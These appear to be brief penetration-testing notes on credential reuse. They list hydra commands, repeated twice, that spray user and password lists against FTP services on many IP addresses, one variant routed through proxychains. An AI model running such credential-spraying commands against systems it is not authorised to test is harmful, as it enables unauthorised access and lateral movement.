Pass the password
- we have user with valid password
- we want to check if the same user and password can be use enywhere else
Tools
ftp
hydra -L user.txt -P pass.txt -M ip.txt ftp -I
proxychains -q hydra -L user.txt -P pass.txt -M ipp.txt ftp -I
ftp
hydra -L user.txt -P pass.txt -M ip.txt ftp -I
proxychains -q hydra -L user.txt -P pass.txt -M ipp.txt ftp -I